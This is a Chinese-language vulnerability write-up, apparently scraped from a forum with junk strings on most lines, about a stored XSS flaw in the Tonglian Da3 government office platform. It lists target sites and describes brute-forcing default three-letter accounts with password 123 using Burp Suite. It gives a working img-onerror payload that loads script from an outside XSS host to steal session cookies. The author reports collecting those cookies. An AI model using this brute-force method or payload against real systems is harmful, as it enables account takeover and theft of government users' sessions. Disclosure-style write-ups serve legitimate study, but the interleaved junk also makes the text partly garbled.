3 v- V$ L* V, I# j) z
6 h" o, N; O% [" j$ E
同联Da3协同办公平台后台通用储存型xss漏洞; [* I8 \* s$ I6 A
- V8 `9 T# J+ s# ?+ R% A! I5 g
' j" R/ E7 J# f 平台简介:
: R' m* H5 w" _* z; M2 d8 h$ i
- @$ C1 Y, q4 h1 t* G$ g
, {$ h+ `5 d& x( M: `
) E, M/ G1 a s- M: J1 r4 R* c4 a
' e$ m2 r# Q* M1 k
3 }0 U) n, t) I% p3 t0 Z$ E: c 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
$ p6 k* t' M1 H同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 {& a" \$ e0 d7 V- a
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
* {9 R2 x3 a2 `+ `% ~
$ G M) P, X6 d8 m 5 k0 I# J6 e; v8 y8 @9 E+ N
. Q# ?% t7 o% l, f8 ^ M
8 }/ p& G Q1 ]" ] 9 I9 w2 _. I; c G/ w3 K- S0 W. e2 c
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 i* }$ H3 |( j3 E3 ^# W
8 x9 X- D7 F8 k# w" l- \$ \. o
1 c- {; n; y/ P) i5 { ?4 v
2 ~) ^% x- y, E4 a* `& n! @
0 }5 Y9 S, z' r0 H$ v, F; I' i
, } i# L. q! d http://1.1.1.1:7197/cap-aco/#(案例2-)
* r- D) w! }' b4 _) J5 ~
" s% D" i/ X1 F8 Z4 e
) ?2 Y. d* _; H- U
http://www.XXOO.com (案例1-官网网站)8 h1 W. n5 N# i+ Y) y
0 }3 p1 ?2 M3 a7 q7 v9 w, R ( y* `9 }7 B7 ]9 l
漏洞详情:/ E' m& [7 K$ S
- m8 ]7 W# G( U% w, R( |% C % ^8 X2 K3 @8 a. ^
案例一、
( m7 R& C7 \# Z( I5 j6 Z) l
5 `1 U& P7 z2 `3 F
- _2 a! ]) H% O$ H) c
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试& \) M n: E: C p0 t, R5 j
8 m- [) `( [" S# F! a) e6 D" }7 A7 E M
v0 W( O8 U- }7 ~, b
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
6 z: R% {4 C( C) }8 i
, z" d3 [4 Y4 `8 T$ M+ n9 g1 C ? # O+ O: n5 ` y; I
9 Y2 O- Z" r3 @
' ~* D. _& K% x i+ h
! W1 d2 Q1 o2 v! W8 }4 ?
" k1 i; S$ n8 H3 D. ?4 E; `0 x, H
7 M& ^& Q+ m+ @3 j
9 J' N _+ G! C! ~( _ status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ' P+ G+ h9 v& g+ E; w# w0 B+ P
8 U+ G6 e: l/ w1 R& ^+ d8 k" Q 4 ]3 g. s- H& M
9 _$ B1 q$ O7 a+ }! v
& R! @" O* U$ J2 ?' k* i
: A: R# _& B+ P2 B1 \/ l, H, E
; F& y/ D" d4 e
' j8 d# ^5 O2 _
0 H2 |( a U4 R A' X7 {! x0 S9 C, t
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
; {- X- f7 H2 w1 ]4 U% f0 P
8 p- o, m- s" r" h% U2 B: H2 F) z
( d* Z/ F$ K5 s* T4 A& n" }3 L
9 J& \8 I) W. S- e" j8 q) f
% v& V) O' B3 s# @- @. Q
5 x9 u0 u) L# p <img src=x
" r% P/ u5 n6 u( N6 M/ W) Konerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
( V. T: |( z9 X: r/ P
7 |1 O/ j& c9 U. g: g) o4 H5 @6 }# u& w * f! ` [( f: ~! r" i5 }9 j- K7 M
6 [5 ?1 I: D Z' S
\9 f3 I3 b+ }$ A7 Q4 K
+ j- a- [3 _( f
然后发送,接收cookie如图:
3 A! B3 b2 d/ X. z8 n% M
9 x& m& e- P* G5 t3 X, l
, R8 r. ^- |: H S9 ^& H
; q( o# l* l6 z5 w. A2 S& M
6 H8 ?; B" B' T! p+ U8 Z5 {
6 O1 U# t3 ^+ c5 w/ B4 a+ a( i8 A
, y9 m. l2 e& E2 l A8 ?
b3 i0 a$ U6 l* `9 j
% }4 f3 a5 d, W* d0 O9 [/ J
6 O5 T% M \2 D
1 V5 P3 w e* b- l: _' W0 D; n& D 7 |5 _ `$ p! X$ d) d* Q
, \# _' }4 `/ T `# d: i
. Y6 [5 T M% Q' X1 N8 ~
0 X4 h' S8 ~% G, Q( o
4 G2 y7 y5 p( w, I2 S& m1 Y) y+ B: [
3 T& ?% i" n9 F0 o& ~; `4 B" p5 b! X 3 N1 U2 e& P& L1 X1 K5 x, B
+ @+ z n- _0 \7 @' ~
7 [$ v% ^8 D4 X |! C" n
2 t) x/ F( a9 r2 n
% h c) Z# y2 ?0 }$ d& L
1 e1 t7 b7 u/ ?
6 A3 A: Z7 r( p7 ]
案例2、
( `# M- |4 W8 Z1 u! r
) v0 y7 @) B$ S' Y) L
8 u- a0 F4 [7 V2 H; L
前面步骤都一样,下面看效果图:
# E, J. ]! x* d, I9 i1 Y
9 u& u% l6 w) `7 k1 A" z w
- `. ^2 [: i8 o2 `3 l! E6 e
- p C: I$ P6 n/ D
0 |" M5 L* L& J3 ?% m7 O7 c
# ~- K9 j! ]9 i d+ M9 m
' M. z# f" n. U1 p2 v9 c! v
0 M! b. G( v& M6 T+ G3 A6 g" h# @
, o) p5 e$ z) P! c, S
' l. ]9 \/ x$ y. ~$ S0 J4 ?
, i0 s1 o+ ?$ p* Z
8 g" Y# F X/ Z
# f9 T: L$ C# I* M) f
4 e6 }& s D5 I/ b: Y) k
9 p$ S% \3 t; L$ Z, o7 B7 b7 `7 N
, V& m3 L8 X/ V/ ^& ?, h4 l
/ z# J: v- {- p) r" o1 ?$ u! \
1 E B [$ j& {0 i, i9 _ ' F) `! Z7 Z/ V. B$ `: t
+ A& |9 m- Y E; k) G1 v: C' l
+ F3 w' O( h0 \- x! ~4 U6 J9 H
+ G0 m+ M$ c& h# h" m7 n
- ]+ B s6 A9 t
n! o% B- ~, @7 }$ z1 s! g6 g
* h7 N6 {4 Q! t$ r* {- J: }
; r3 @8 o) _% e 4 x( B8 f4 ~' G$ T
9 B, b8 w- F: L4 K1 R M
+ }8 m" l1 @! G( i |$ r